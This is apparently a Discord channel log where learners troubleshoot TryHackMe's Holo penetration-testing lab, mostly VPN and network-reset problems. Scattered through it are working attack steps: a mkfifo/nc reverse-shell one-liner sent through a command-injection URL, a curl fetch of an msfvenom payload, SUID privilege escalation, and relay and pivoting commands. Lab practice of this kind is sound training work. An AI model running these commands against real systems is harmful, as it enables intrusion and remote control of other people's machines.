#holo-network
holo colo
Hey all -- I just started working through this network on stream. For those interested, here's the first video where I work through the first 13 tasks. If anyone is stuck or would like to follow along, I hope you find this helpful. I'll be completing the full network so feel free to follow along on YouTube
https://youtu.be/4ue2Kc0cdlQ
In this video, we begin a brand-new network and start working through the "Holo" network on TryHackMe. This is an Active Directory (AD) and Web-App attack lab that aims to teach core web attack vectors and more advanced AD attack techniques. This network simulates an external penetration test on a corporate network.
In this first video, we co...
ehh, holo is rated with a Difficulty: hard not medium
Well shoot, my google image skills need to up their game
I'll fix that, thanks for the catch
Hey man! I was watching your videos on AD network and saw the interview with John Hammond. Great work! I will probably check this one out too
Hey!! Really appreciate the kind words!
Definitively some really great questions on that interview, it really helped in getting to know more of the mindset of interviewed, and not just the work/hacking-related type questions. You should bring more people on, cof 0day cof
in task 19 when you want to escape the docker container, even if you caught a shell or not, the IP of L-SRV01 changed from (10.200.114.33) to (192.168.100.1)!!!
which causes it to be unconnectable from outside. Any solutions?
Thats exactly the point. You have to learn pivoting
If I remember, the docker was public, but the docker host is in the internal network
in order for your machine to access the internal network (aka 192.168.100.1) you have to use a tool such as sshuttle (https://github.com/sshuttle/sshuttle) which creates a kind of VPN connection to the internal network
Or you can also use chisel and proxychains
dude its not a pivoting issue XD i cannot access the web server anymore! thats it
the dashboard page is refusing to load
i think the problem is on your side because i was doing the room the whole day and i was fine
can someone guide me please
i'm trying to learn some C2 and i have some questions regarding spawning an agent for the .31 host via the .33
what do i do
Is the .114 network working correctly? I can't seem to reach port 80 on .114.31 even from the compromised Linux machine
Can someone reset 114?
is the .111 sub down? i cant ping .111.30
Can somebody explain me why I cant find subdomains with gobuster.
maybe gobuster is not designed to find subdomains
Its literally said that I can use gobuster or wfuzz
maybe try wfuzz ¯\_(ツ)_/¯
Should I configure DNS or something?
doubt so
not done any networks so no idea
If anybody know solution, I would appreciate it. I am unable to solve this for 2 hours
Holo Network is up, so idk
Also tried wfuzz but same..
which sub are you on?
what do you mean by "sub"?
10.200.155.30 is Domain controller
is that kali linux?
yeh
because I dont have that file and I saw in walkthrough that some guy also changed that folder
/etc/hosts
And I didnt. So maybe thats the reason it doesnt work for me
I found that folder, should I insert IP of DC or IP of server L-SRV01?
DC1
idk what im doing but the .111 subnet is not responding to pings, nmap scans or wont show when i put it in hosts
Oh
Nmap worked for me. I scanned L-SRV01 with this range "sudo nmap -sV -sC -p- -v 10.200.155.0/24"
but gobuster doesnt work for me
But after adding IP to /etc/hosts file I get other error
port 80 not open
should be open
it's the wordpress ip that ends in 33
scanned 4 times
port 80
nothing
waiting for a reset
Hey y'all. I'm trying to set up a general testing environment for windows security. I see a bunch of sources out there but can't tell if I can trust em. Can anyone recommend where I can grab a legit copy that isn't the eval version? Preferably server 2019 <
nvm, figured it out
This channel is for the holo network on tryhackme
I was doing the holo when I posted it. I was trynna create a similar environment and looking thru some options i had
Looks like the network is down again. waiting for a reset as well
Your question wasn't related though
Where am I supposed to post it then? General aint answering and you even refused to answer last time I recall
#infosec-general
You're not entitled to an answer though. Everyone here is a volunteer.
that I am aware since this is a discord community lmao but no one said nothing about entitlement tho. im just trynna figure things out just as much as everyone else is
No worries. Looks like you found your answer.
Does somebody know why gobuster cant find dev.holo.live subdomain. I am doing dir scan... And I am getting following error:
holo.live is fine, I can do vhost scan (obviously bcs I found dev domain) and I can visit webpage on web browser
Is dev.holo.live subdomain down?
do you have it added to hosts?
sry, but what do you mean?
oh, yes
10.200.155.33 holo.live,dev.holo.live,admin.holo.live
is my /etc/hosts file
I found solution, thanks!
Gave +1 Rep to @unreal hemlock
Why when I insert "http://dev.holo.live/img.php?file=/var/www/admin/supersecretdir/creds.txt" in browser, I am offered to download img.php file, instead of taking me to /creds.txt file
Hey
Does somebody know why suddenly admin login page on admin.holo.live is loading permanently after I inserted correct login credentials? It worked few minutes ago till I downloaded payload from python3 server that I am hosting, ran command via URL and got "10.200.155.XX - Command shell session 25 closed." on msfconsole
i have the same problem
Network has been reset. I'll try later if it works now. If you could write here if it works for you, I would appreciate it
Now network works
let's hack it)
Yes. It works for me, too
I can't login successfully into admin.holo.live. Its loading it forever, again..
What about you?
i got shell
I came to part where I need to escape container (TASK 18). Suddenly webbrowser froze and I now can't login xd
Funny room
i'm in task 16
Can you access holo.live?
maybe you can try to restart your pc
Tried that
I am running Kali VM for hacking this room
But still..
Could you try access holo.live
yes
i have to all subdomain
dev.holo.live too
for me all works
I can access dev.holo.live too
But cant holo.live
And cant login in admin dashboard
i couldn't login in admin yesterday. But now all works. Maybe you can try to get access later?
Yes. Same was for me.. I went to sleep and it worked tomorrow. But Im frustrated with this network, constantly having bugs..
u can try to change your VPN
maybe it will help you
You are welcome!
yo
Does you L-SRV01 have internal IP address. Because till my problem appeared, I had external IP address 10.50.155.33. Now its like this
i have the same ip addresses
like mine?
yep
Yea, but I realized it is wrong move. So I changed back to 10.200.155.33
Restarted NetworkManager and still doesnt work
why can't send the screenshot
you need to verify yourself
Hello everyone!
If somebody could help: in task 28, we have to give
What page does the reset redirect you to when successfully authenticated on S-SRV01?
I'm providing the name but it does not accept it..
any idea?
Okay, thats because there are more HOLO networks
My is 10.200.155.33
I mean, it was
Now its 192.168.100.1
But thats wrong one
my was 10.200.95.33
but now ip 192.168.100.1 and i didn't change my /etc/hosts and everything works
haha
Idk at all what is happening but nvm
Thanks anyway!
in task 28, they are asking about this page aren't they? (I blurred some part so no spoiling)
I have a problem in Task13 to generate reverse shell. I found the place to put the command but when I try in the browser with rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.50.108.41 4444 >/tmp/f the nc does not reach the target.
I also try to encode the url with Burp Suite
I have the problem in Task 20 with privilege escalation
when i use docker suid privilege escalation it output Unable to find image 'alpine:latest' locally or
the input device is not a TTY
if i don't stable shell.
What's the problem?
run nc -nlvp 4444 and then
http://admin.holo.live/dashboard.php?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.50.108.41%204444%20%3E%2Ftmp%2Ff
should help
I did it this way:
I made payload in msfvenom (linux/x64/meterpreter_reverse_tcp)
I uploaded it on python3 server.
I downloaded that payload from URL bar by typing: "admin.holo.live/dashboard?cmd=curl http://YOUR IP:PORT/payload -o /tmp"
Changed execution privilege with "dashboard.php?=chmod 755 /tmp/NameOfFile"
And executed it with /dashboard.php?cmd=/etc/NameOfFile"
@unreal hemlock if stabilize it says Unable to find image alpine:latest locally
@unreal hemlock i stabilize by python3 pty and export and then background it and run stty fg and so on
hi
instead of alpine:latest use the image available on the server.
use docker image to list available images
thank
Gave +1 Rep to @unborn siren
web server are not working so much is it possible to reset ?
i tried again to privilege escalation but it didn't help
didn't help
oops
finally. bling bling
thank you
Gave +1 Rep to @unreal hemlock
anyone please?
I just tried ||reset.php|| and it worked, I was trying ||home.php||
Hello,
Did anyone succeeded with covenant (either powershell or HTTPGrunt)? I've been on it since yesterday with no luck (Idk if I should stick to the plan or switch to metasploit).
Thanks for your advice.
Right now I'm getting :
Illegal characters in path.
at System.Security.Permissions.FileIOPermission.EmulateFileIOPermissionChecks(String fullPath)
at System.Security.Permissions.FileIOPermission.QuickDemand(FileIOPermissionAccess access, String fullPath, Boolean checkForDuplicates, Boolean needFullPath)
at System.Net.WebClient.GetUri(String path)
at System.Net.WebClient.UploadString(String address, String data)
at GruntStager.GruntStager.ExecuteStager()
with default templates and the modified ones (when testing locally)
I see, I always had issues with Covenant ... but I gave it a chance this time again, thank you so much, will move on then!
Gave +1 Rep to @unreal hemlock
Hello!
For task 36, my understanding is that we will have the right to winRM for ||PC-FILESRV01|| using the account we found earlier ||watamet||.
In the text we read : If successfully authenticated, you should now have a working WinRM shell that you can use to execute remote commands.
it means that should work.
unfortunately I get a permission error, either using the account password or its hash.
$ proxychains -q -f proxychains-1081.conf evil-winrm -i 10.200.112.35 -u w****t -p '**********'
Evil-WinRM shell v3.3
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
I tried also winrs from S-SRV01 with the same permissions issue.
PS : I'm sure about password as I used it to RDP to S-SRV01
Anyone can help please?
Hello
I'm in Task 29. I want to catch traffic by BurpSuite. In browser i have access to S-SRV01 by foxyproxy. Foxyproxy use 1080 port and because of it i have access. So in BurpSuite i changed port to 1080 for catch traffic but it gives error that some program or process use this port. When i want use foxyproxy port 8080 that burpsuite can catch but if i use 8080 port i don't have access to site S-SRV01. How i can catch traffic by BurpSuite?
You can set an upstream proxy in burp
I did it and change foxyproxy to 8080 i can catch traffic but it loading infinity. What i did wrong?
Proxy host is wrong. Destination host is wrong. Proxy port is wrong.
Essentially every field except "enabled"
I used SOCKS proxy in Burp that's help me. But anyway thank you for help and feedback. Later i will figure out how works upstream proxy in Burp.
Gave +1 Rep to @quiet raft
Holo seems to be stuck in a "loading" loop for me (loading tasks). I haven't joined the room yet. Anybody else having the same issue?
Network 10.200.107.0/24 is screwed up need help resetting it plz
Hey all, I'm currently doing the AMSI bypass. When I run amsitrigger against one of the ps scripts I get no results - is it because I'm running Commando VM?
Yeah, is amsitrigger just bumping the file up against windows defender to check for failures?
For some reason I thought it was doing something independently. I'll install a clean VM for it I suppose
Is there an issue with server? It's showing as running but no boxes responding
I'm in 10.200.112.x and it is running ok
10.200.114 for me and no response from anything.
I hope your reset count is near the requested 5 reqs; this morning I was the 5th to request it in my network
I am 1 of 4 haha. Task 43 too so nearly done with the box.
I'm stuck with the SMB relay... ( T47)
Hello everyone!
I finished the room and wanted to share some points, to have your feedback and eventually help others;
As far as I know :
- the WinRM PTH does not work, as user does not have the right to do it;
- the DLL hijacking does not work, as the scheduled task to run the script ||execute.ps1|| that simulates an admin running the vulnerable binary does not exist on the server;
- SMB relay did not work for me in the intended way, but I did it another way. May be I'm missing something;
- Covenant does not seem to work (?)
if anyone can correct me I'll be thankful (because this means I will learn something).
whenever i try to download my .ovpn file it downloads an empty file, anyone know how i can fix this?
Click regenerate, wait 2-3 minutes, download
still downloads an empty file
Did it start working for you at all? (And which subnet are you on?)
unfortunately it hasn't, but to be fair haven't tried as much cause i was learning for my exams, i believe i was on the 200.162 subnet
Ok, someone else was reporting something similar, if leaving and rejoining didn't help then not sure what needs doing. I'll update when i do know
Are you still in the network? and when you get a chance, can you confirm the subnet?
my bad, i based myself off my report, which was at the launch of this network xd , my bad the actual subnet is 200.69
ah brilliant, are you still in that network? If so, stay there please
Also, what's your THM username?
The web server is pretty instable it is not possible to get a reverse. Is there a backdoor to do the task 16 or after directly ?
Hey guys, quick question, how long is access granted to holo and if time expires can you start again. Thanks
7d and yes
Perfect thank you
Gave +1 Rep to @quiet raft
Apparently we can't see you in that network, so if you're still in it, try leaving and rejoining?
The host 10.200.111.30 is not attainable.
it happened to me too
the host is down
yes it does
There's many instances of holo, you need to specify which one you're on.
That is not how holo works.
Staff can't reset it, and you need to be patient. Discord staff especially can't do anything.
Gang
skill issue
Discord staff aren't here to help you with networks.
Don't ping me for this
I can't.
can someone help me in this. I can't connect to the holo network
The Holo network openvpn file size is 0 bytes when downloaded and it won't connect. I contacted support a week ago but they still did not come up with the solution. They post an update every 2-3 days and asks one question and wait another 3 days to reply. Very disappointed with the customer service.
Same issue. The vpn file is 0 bytes and clicking on regenerate gives 404 error.
Leave the room and rejoin. That's what fixed the issue for me.
I can't escalate my privileges. The error is the input device is not a TTY.
I'm having a problem on scanning the first target L-SRV01
I can't connect to the port 80 web server
seems to be broken
did a double take there for a second
I have the same issue right now but with holo live
anybody having problems with vpn's thm on holo?
Sorry I'm only seeing this now. Is it resolved? If not you can try regenerating and if it occurs again please let me know
yeah. with these kind of rooms that need their own vpn files you will have to regularly delete your old file, regenerate the file and connect back
its the same with the wreath room
im having problems fuzzing the parameter for the admin room
i don't know why its not finding the parameter with FUZZ
ffuf -c -u http://admin.holo.live/dashboard.php\?FUZZ=ls+-la -w holo_wl.txt
same error when i put :FUZZ at the end of the wordlist.
anyone?
you did a directory scan. so its going to look for directorys, not a dns servers such as dev or www. you need the dns switch
I could do the parameter fuzz with owasp zap but I can't get it to work with ffuf.
What do you mean by regular? Is there an instance where an configuration file is working one day then the next it is no longer working?
i mean because a lot of people are doing those rooms and eventually it does come down
so i would say yeah, about once or twice a week the room gets kind of messed up and I have to delete my old vpn file and regenerate a new one
don't redownload the same one. refresh the site, regenerate the vpn and re download it
Are you referencing the network itself being messed up? You can just restart the network and it pushes it to a clean slate.
There is no reason you should have to regenerate your vpn file. All you're doing is putting yourself in a new subnet you're not actually changing anything
like right now the room seems messed up.
but i guess you're right about the vpn file for the holo network.
the reset is the best option but I have to wait a while to make my votes meet the requirement
Hello, I seem to be having the same 404 issue when trying to download the holo openvpn config. I have tried multiple servers, multiple browsers, and the leave, logout, clear cache, rejoin trick. Any other suggestions?
the same problem. :/
vote now if possible so we can reset. admin panel is not working
i voted for yall
It'd be great if a staff member could take a look at holo as it seems to be having issues. For the last 12 hours or so, I've been unable to reach DC-SRV01.
It seems the network has been reset at least once, i am for sure connected with the holo ovpn and my hosts file is updated.
@earnest hornet any way you can get someone to check this out? 
Did you pivot to it?
nah it seems down right now
unable to connect but the pings go through
can't curl. says connection refused
pivoted to admin yes but the initial target is unreachable. that is the core issue
yeah its saying unable to connect for me
i can't connect to the original 10.200.110.33
or any of them
for the past two days
for sure. i just started it. idk man.
lets get another reset going
i can't ping it
its weird.
the pings work for the starting website of www.holo.live but i just can't connect to it
my holo network shows that i'm connected
the last reset did not work i guess
.33 is working for me even though it shows 10.200.108.30
mind if i dm?
anyone know what's happening to the network? Can't access anything even though I'm connected to the vpn
I'm probably really dumb - but I can NOT stabilize the shell in task 14 (which you need to complete task 17, I believe). Whenever I bring it back from being suspended, it goes into this weird terminal that you CAN'T get out of unless you click on the X in the top right of the window. What in the world am I doing wrong?
Are you doing the stty -raw and fg method?
And the syntax for the python command is wrong - it's supposed to read "python3"
Are you on recent kali AKA zsh?
yes, I'm doing those commands. yes, I'm on the most recent kali. I didn't realize it was zsh. so, I need to do the one-liner I assume?
You just need stty -raw; fg, I think that's the change at least
Either way, the stty and fg need to be in one command spaced with a semicolon
I'll give that a shot - thanks!
ugh - i think someone did something to the "dashboard.php" file, because it's just stuck now
it's back
Hello, I'm at Task 4 and have no idea what to do. I am a newbie. Can i start with the holo network or should i do all the learning path first?
If you have no idea what you're doing, probably do some rooms and then Wreath.
Then Holo.
Is the Holo network having issues again? It's showing as "Resetting" for like half an hour now...
I was having issues with Holo yesterday - nmap couldn't detect any host on any IP or port. Couldn't ping anything either.
Hi,
Why is the network always has issue? Starting the network after stopped state I'm not able to reach the targets and it always happens.
If the solution is resetting pls hit the reset button, thank you.
it is showing "Network state: Resetting" for weeks now. I can't start or stop anything (reset button doesn't work either), but the hosts are reachable.
Mysql server is broken. Can someone reset the network pls
Or can people vote for it to be reset and stuff Pls
Just so you know, you can vote to reset once per hour, so you can reset it on your own, it might just take a bit
yea I just dont really want to wait 3 hours 🤣 cus I wanted to finish this today. Looks like I might have to though
Ye, just saying, because only the few people that share the exact same holo network with you would be able to help you with resetting
I wonder how many others are on it with me rn, I'm guessing theres a limit of like 4/5 people or something
Ye, some little number like that
They are many instances, please specify what instance you're on to avoid unnecessary resets.
Its at 4/5 now and I only have to wait like 20 mins don't worry about it mate
Ok after a reset it is still not working
I must be doing something wrong here
This is the correct command, right?
Sorry some context
I'm on task 17
trying to connect to the remote mysql server
so I can then go on to escape the docker container (task 18)
I think its a problem with the mysql specifically
I'm on 111 btw
That's unrelated to what instance you're on
o rly
my bad
I mean the server not my client or whatever
I was being an idiot. Doing something wrong.
apologies to anyone
Hi, I'm unable to login to the administrator domain with the given creds
Plus the network state is just stuck at resetting with 4/5 resets
Can't do anything
I am having the same issue since at least 2 days now:
- Subnet 95: 10.200.95.0/24
- Network State: Resetting
- Network up time: -
- Start, Extend and Reset Buttons are greyed and cannot be used.
Any way to reset the network? I mean properly reset it...
I am unable to download the hololive vpn configuration file.
I am a subscriber
have you tried leaving and rejoining the room hitting the regenerate vpn file button waiting 5 mins then clicking download???
I already tried regenerating configuration file but no benefits.
I already completed holo before but just wanna brush up few things.
the leave and rejoin of the room will not change your progress but might still help you get a working vpn file
Sir/Mam i solved that complete env last year. I just wanna do it again. There is no rejoin.
Keep getting this.
how long usually it takes to reset ?
wait wut??
I found the credentials but I cannot login to the admin dashboard of holo.live... it keeps showing me the login page... Is there any problem with it?
then after leave use the following link: https://tryhackme.com/jr/hololive
then regenerate the config and then try downloading it again
Holo room isn't working
ive regenerated my ovpn file yet i can't still access it
@lone spruce
I can't access holo
its been 1hr now
since i've been trying to access it
I encountered the same problem.
i Found credential but cannot login
Holo room work ?
I was trying right now to complete this network - but me too I'm stuck at login - credentials do not work . I am on 10.200.110 in case there are multiple instances of the network
Ded network
Can anyone let me know holo network can stil work ?
its partially working but idk
Is Holo still down?
Is Holo down? Network seems up for more than 10 minutes but L-SRV01 is not responding.
Holo is stuck at Network state: Resetting. Buttons to Start/Extend/Reset are greyed out. Can someone check (or reset) please?
Is HOLO still down?
holo?
up and down and up and down...
?
hey guys can anyone help ? I'm doing the nmap but somehow i manage to get only the .250 host and not the .33
nmap -sV -sC -p- 10.200.112.0/24
:/
Currently there are a few problems with HOLO. Just try again. I had the same problem yesterday when scanning the internal network with crackmapexec.
Since the reset I can no longer bring chisel on target .33 (no more space available - => / is using 99.8% of 7.69GB). I'll check back tomorrow.
just scanned the network. Got .33 and .250.
thanks. I'll try again tomorrow then.
Gave +1 Rep to @molten nova
Anyone have an idea how i could create some disk space here?
└─$ ssh linux-admin@10.200.112.33 130 ⨯
linux-admin@10.200.112.33's password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-1030-aws x86_64)
System information as of Thu Dec 15 08:08:43 UTC 2022
System load: 0.01 Processes: 100
Usage of /: 99.8% of 7.69GB Users logged in: 0
Memory usage: 4% IPv4 address for eth0: 10.200.112.33
Swap usage: 0%
=> / is using 99.8% of 7.69GB If I want to upload chisel, but "No space left on device"
So...yesterday using the nmap I only had the .250 host. Today I get the .33 too but the port 80 is not showing...what the fuck is wrong with this room lol
how am I supposed to train in this condition
After the reset I see again only .250
Just little annoying, but maybe that's what you're supposed to be taught in this room. Patience and persistence.
@sage pine ?
hey is .33 up?
I gave up
Hi,
When I run:
gobuster vhost -u http://holo.live -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 30
It doesn't find the three domains.
Any idea what I am doing wrong?
is your /etc/hosts set up correctly? I also used wfuzz
wfuzz -u holo.live -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.holo.live" --hh 21456
hi not sure why i got all hosts down when i did nmap on holo
anoything wrong w the system?
I'm having trouble with the 10.200.108.xx can a mod reset please
You VPN'd to holo?
No
I don't access. I pressed the "Reset" button, but only 1/5
can someone help me with vote for reset?
I am using the Kali machine from your web and I don't have access
For what it's worth, I used the file subdomains-top1million-5000.txt
I got the 3 subs very quickly and checking the file, they are all in the top 25 lines within that file. Things got ugly soon after though, and I got a bunch of timeouts.
You might save time using a smaller file.
Made good progress. Was nearly broken out of the container when the network stopped working just before I could do the final curl command.
Now I can't ping anything and I guess have to start over.
I guess I'm vote 4 of 5 for a reset.
There is something I'm not I understand. Should I go over the tasks and hack or I supposed to go blind hack all the network and sometime to pick on the walkthrough?
The network was up and now it again down
Does someone is looking over it ?
Ok I was able to reset it, let's see
still down
yes i did
hi it's still the same
this is now on attack machine but it shows the same result too
5 hours ago when I started it was up and after 40-50 minutes it went down again
was up and down again
hi
trying to escape the container with any possible way im getting the error "the input device is not a TTY"
is that my reverse shell messed up?
and when trying to sudo, resulting in
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
You will only get ping returns from 7 IP addresses, one of which is the gateway. That's a lot of scanning up front with your command, would suggest a ping scan first, and then a more thorough portscan when you've found hosts that respond
that screenshot is accurate, in that the majority of the subnet is in fact unresponsive because there is nothing there
For this room, the privesc method is an SUID binary. Sudo wouldn't work anyway as you do not know www-data's password.
Did you stabilize the shell?
python3 -c 'import pty; pty.spawn("/bin/bash")'
then ctl-z
then
stty raw -echo; fg
then < enter >
then
export TERM=xterm
or maybe just the export
Try searching for SUID vulnerabilities
find / -type f -perm -4000 2>/dev/null
You will find a binary that can be abused (SUID), Go to gtfobins.github.io to find the method. It needs to be modified slightly
Thanks for the advice, eventually it was a different docker run command I found on stackoverflow that got my the root access, I probably messed up the first pivot shell
Anyone having issues with the Kali machine to use Burp? I don't have the HTTP History window, it's say it empty
why I can't upload images ?
hihi, i tried to do a ping scan this way
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -sp 10.200.110.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-28 03:45 EST
Could not parse as a prefix nor find as a vendor substring the given --spoof-mac argument: 10.200.110.0/24. If you are giving hex digits, there must be an even number of them.
QUITTING!
but got the above.
then when i tried to add www.holo.live to /etc/hosts
like that below
but i cldn't get to the webpage
can someone help me
HOW u succeed to upload images? I don't have the button from the left to upload
-sp is not correct for what you're trying to do.
Nmap flags are case sensitive.
does anyone managed to download sshuttle into the S-SRV01?
im getting unable to access git hub
and pat install also ends up with error
apt*
also i cant sudo as root
S-SRV01 is a windows box - there is no ~~spoon~~ sudo.
L-SRV01 is the only Linux box on that network. You have to break out of the docker container and then crack the passwords. One of the accounts has wide-open sudo access to let you continue further
already did i have the pass and user also made sshkey persistence
but cant manage to break free, as i want to use sshuttle
as for 'apt install', I would recommend you obtain the sshuttle binary on your Kali box, host it, and transfer it to L-Srv01 that way.
many people stuck here too
what is task 15 want me to do
i'm very confuse
i passed now
how to fix if room bug ???
The room is not bugged - this is a new concept that requires some patience and experimentation to become familiar with exactly was is going on . It's not a typical CTF (even though there are flags), rather you are encountering 'layers' to a network. And the web services running on L-SRV01 are the first layer.
sorry for misunderstanding you, i have exec terminal and it not finished then the dashboard.php not responding so i can't connect to admin.holo.live/dashbaord.php to connect my terminal again
I tried several times so I guess I need to reset instance
do you get any output from "admin.holo.live/dashboard.php?cmd=id"
no
I just connected to the HoloLive network via VPN. Logged in to admin.holo.live using admin:DBxxxxxn! password, then browsed to admin.holo.live/dashboard.php?cmd=id, and received the output I was expecting.
it should have 1 instance right why i can't normal login
XD
i will extends network and try again
for those of you how have troubles (like i had) with receiving incoming connection from NTLMrelayX(Task 47) use the version v0.9.22(i first tried with v0.10.1 without success) and BEFORE setting the port forward in Meterpreter make sure that you have set in proxychains config version 4 of SOCKS protocol(i had 5 set and it didn't received any communication)... be careful with these versions otherwise will not work. very nice room! thank you @lone spruce and thank you @daring fulcrum
Gave +1 Rep to @lone spruce
Is anyone's vpn connection to the network being weird
trying to get a shell from PC-FILESRV01 cant figure this out
got a webshell on S-SRV01
tried every shell i know and can connect, the weird thing is i can ping my machine from SRV01 and cannot ping from my machine to S-SRV01
smb client / winrm/ xfree rdp/ nothing can reach the filesrv
Is this the step that requires DLL Injection and messing with a scheduled task? If so, I completely bypassed that and got privesc using the PrintNightmare exploit path. The scheduled task was not running. I ran PowerView.ps1 and got the PrintNightmare route that way
Thanks for the answer, and that's what i intended to do, problem was im having problem with the proxy which i cannot reach all the machines in the network...
i used chisel. Set up the socks5 connection. With xfreerdp you can supply the /proxy command line parameter: xfreerdp /log-level:OFF /w:1600 /h:1024 /v:10.200.110.35:3389 /proxy:socks5://localhost:1080 /d:hololive /u:waβet /p:Nothβrry!
creds don't seem to work for admin.holo.live on the 10.200.95.x subnet. Anybody else have this issue?
Make sure you set up the proxy chain and chisel/port forwarding correctly
First off the other machine is windows therefore it shouldn't work I think
Gave +1 Rep to @zenith talon
Yea I'm guessing it's a problem with the room, I really tried every possible way
Maybe chisel AND port forwarding as a tunnel between them?
is anyone experiencing connectivity issues in the 10.200.114 network?
on the filesrv, as i understand, there should be a user defined scheduled task?
Same as a lot of people, i cant download the vpn file. 404 error.
leave/rejoin room?
yes i tried that and it didnt work
an answer from the room-bugs channel :
"leave the room.... rejoin it.... go to download the vpn file... hit regen button... wait 5 min.... try download it... maybe tada"
i was doing that a couple of times, logging out, trying different room links, it eventually downloaded it
hi. I'm attempting authenticate to pc-filesrv01 host but 445 port is not open.
and reset button is disabled on this network. I can't continue to tasks.
You have to pivot to it by using a socks proxy. Read through the previous material
I done it with metasploit and chisel. Running nmap return other port but not 445. I also run nmap on l-srv01 host. But got same result.
Which task/step?
task 37
for some reason ||dashboard.php|| is not loading, is anyone with this problem?
Port 80 is down for me
strange, tried to reset but It needs 5 votes
I reset it about 3 hours ago and ran a Nmap scan again and port 80 is down for some reason
My port 80 is fine, just the ||dashboard.php|| that is not loading, I don't know If I can ask for a staff to take a look
very strange
when I try to download the vpn config file it says it's lost in the matrix? SOLVED
Any reason whenever I run ffuf or gobuster against ||holo.live|| I get errors? I added it to /etc/hosts already. I can load it up on firefox going to the domain and dirbuster it but whenever I run a nslookup it gives my the IP address to the public version of ||holo.live|| Im not sure how to troubleshoot this.
Same thing is happening with me when I am running gobuster. I even tried resetting and running gobuster with less threads, still the same. Not sure why
Hi, how did you solved it? i'm having the same issue
I left the room and joined again! also kept fiddling about with the regenerate button for the download (:
I had the same issue, i'm not entirely sure what was going on, but it started working when I put the IP address in instead of website url
but it was being a nightmare after that too
Thanks for the info @worn burrow
Gave +1 Rep to @worn burrow
np man, how far into the network are you now?
Thanks @worn burrow
Gave +1 Rep to @worn burrow
do you have any issues with the websites not resolving correctly?
i cant reach holo network?can someone help?
have you tried downloading a new vpn file?
yep, now i can reach but there are alot of vhosts
try replace the URL with the target IP (:
can i dm?
of course
can some one help on holo network?
I think you need to login first
404 When trying to download the Holo Network VPN?
Can you head over to the room https://tryhackme.com/room/hololive
Press "options" -> "leave room"
After that, click here -> https://tryhackme.com/jr/hololive
Once you have rejoined the network, make sure to regenerate your new configuration file by heading to https://tryhackme.com/access, selecting the network from the dropdown, and finally clicking "regenerate"
I've never used a THM lab environment before. After 9 days, access is cutoff regardless of completion?
Hm, Can't connect to the Network with the VPN, It kept giving me Restart pause
Left and rejoined and regenerated the vpn multiple times
Still same problem
Update: VPN is working Now the problem is related to OPENVPN version. If you are using Latest version of Parrot OS and facing this problem, add the --data-ciphers AES-256-CBC to the holovpn file either at the beginning or ending
can anyone reset or vote for reset the 109 subnet
Do you mean a vote reset for the room?
If so, just did
Yeah i mean some mods can reset the room right
But thank you
maybe @pale plover or @earnest hornet
I cant ping the machine, im in the middle of docker breakout and network time ranout, i restarted the machine since then i cant access it
Mods aren't employees, only community staff :)
there is 13 mins left
Jabba knows everything about computers, now that he replied, it should work after 15 minutes
Sorry, my bad
Not a problem, common misconception
I don't have permission to manage the networks, but I'll see what I can do
Jabba, who are the members that check and work on room bugs? Is it only the room creator for 'x' room?
And specific tryhackme staff
Like Ninja?
No, mods are not THM employees
its my 1st time am accessing Holo and its showing 9 days access left so i can't access holo after 9 days?
No that is not what it means... It means after 9 days you are automatically removed from the room to save resources... You can join it again right after... And the answered questions are never reset
ok thanks for info i was worried cuz i got function in few days
Gave +1 Rep to @iron galleon
Task 35 AV Evasion Wrapping the burrito
can anyone help me
No matter which method i use i cant get the revershell
I tried to ping my attack machine from target box its pinging
I used the script in the task
I used Nishang with simple php backdoor
so far no luck
I even tried to get the revers shell on L-SRV01 from S-SRV01 that didnt work as well
Well, I wasted my whole day on this so, I disabled AV and enabled it after i got the shell
oh come on guys fix the issues with holo and wreath please
Hey! Looking for some advice with domain resolution
I added holo.live to my /etc/hosts and the associated ip, however in my browser whenever I attempt to access it, it sends me to www.holo.live instead
Unfortunately have to agree with the majority of people in this chat, holo is not the best
I have a random connection to L-SVR01 that sometimes resolves, most of the time doesn't
why does http://www.holo.live keep resolving to the internet-based site?
I added it to my /etc/hosts
keep getting that
It only resolves when using the ip, can confirm
Holo seems to be better now
Also was my fault, was using a comma to separate hostnames lol
servers still sluggish/time out though
The dashboard broke, F
Hi all, In task 10
In a black box pentest, how find the hidden parameter example= on x.php. i.e x.php?example=
This is already explained in the room with wfuzz
Got it, thank you
hi, for task 47, i'm not receiving a connection from dc to ntlmrelayx, i started it before i created the meterpreter tunnel, also im using the 0.9.22 version of ntlmrelayx, any ideas please?
Is there anything to observe at task 9? I am scanning for several hours now with gobuster, but don't get any hits.
Hey guys, can I approach this room from a pure black box pentest perspective?
Yes, although the very final step could be difficult as it involves an attack my co-creator found and is only documented in a few locations. Everything else is easily done from a black-box approach
task 19 cant exploit the docker suid binary cos i didn't stabilise the shell?
need redo the attack chain from task 14
Perfect, thanks for the heads up. I'll get on with it then
Gave +1 Rep to @lone spruce
Alright holo - here we go!
holo was a good time ty team who put that together
Hey guys. Is the Holo network down right at the moment? After it has paused i am not able to reach any of the hosts again. VPN is fine. Tunnel is up and routes are correct. Maybe someone can upvote the reset button?
is the web page for L-SRV01 supposed to be "parked"?
how long does it usually take for a network to reset? I wanted to tackle this network but it has been saying resetting since i opened the page and I can't reach any hosts.
It suggests where to go to see more info
On Task 14.. I can't seem to stabilize the shell... and only some commands are providing data to stdout
is there a way to confirm what's working and what isn't?
nm. i answered my own question
for anyone else having this issue... i figured out that for some reason although the instructions on the task direct you to run python as just "python"... i got this to work by hunting down (find / -type f -name '*python*' 2>/dev/null) exactly which version of python is installed
and then i just ran
/usr/bin/python3.6 -c 'import pty; pty.spawn("/bin/bash")'
voila! stabilised shell
on task 16... my network went to sleep or crashed.. whichever
and now, i can't reach 10.200.155.33 (literally, no route to host)
ideas?
